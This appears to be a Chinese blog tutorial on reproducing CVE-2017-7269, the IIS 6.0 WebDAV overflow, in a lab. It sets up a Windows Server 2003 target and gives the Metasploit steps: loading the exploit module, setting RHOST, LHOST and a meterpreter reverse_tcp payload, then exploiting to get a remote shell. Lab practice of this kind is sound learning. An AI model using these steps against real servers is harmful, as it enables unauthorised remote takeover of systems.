复现CVE-2017-7269(过程,步骤,说明)

配置环境:Windows server 2003 靶机
kali2.0以上版本
前言:做实验之前要确定一下靶机与攻击主机可以互相通信
一、配置Windows server 2003 靶机
1、打开添加/删除windows程序点击添加/删除windows组件
在这里插入图片描述

2、安装iis6.0中间件:
在这里插入图片描述

3、打开iis将iis中的webDAV改为允许
在这里插入图片描述

4、打开网站找到默认网站右击属性,将ip地址改为本机ip地址
在这里插入图片描述

这个时候呢我们的靶机已经配置完毕了,接下来我们来配置我们的kali
二、开启kali
(第一次使用msfconsole的时候我们要配置一下数据库连接问题,具体请看我的上一篇文章)
1、接下来我们将下载好的exp传到/usr/share/metasploit-framework/modules/exploits/windows/iis目录下
(这里我将cve-2017-7269的名字改为了cve_2017_7269,因为我发现我名字是cve-2017-7269的话在msfconsole中查询不到上传成功并且进不去exp)

在这里插入图片描述

2、打开我们的msfconsole,并且查看一下是否传入成功
search cve_2017_7269
在这里插入图片描述

3、然后进入到exp里面
use exploits/windows/iis/cve_2017_7269
在这里插入图片描述

4、查看源配置:
show options
在这里插入图片描述

5、设置靶机IP、靶机端口、攻击IP、对方网站、返回载荷:
命令格式如下:
设置靶机IP: set RHOST 靶机ip
设置靶机端口(上图可见,默认端口为80,这里我靶机的端口改为了8080,如果你们没改的话这里不用设置):set HTTPHOST 对方网站
设置返回载荷:set payload windows/meterpreter/reverse_tcp
设置攻击IP:set LHOST 攻击主机IP
在这里插入图片描述

6、进行溢出
exploit
在这里插入图片描述

7、获取shell:
shell
在这里插入图片描述

  • 7
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 3
    评论
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

不爱学习的安全小白

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值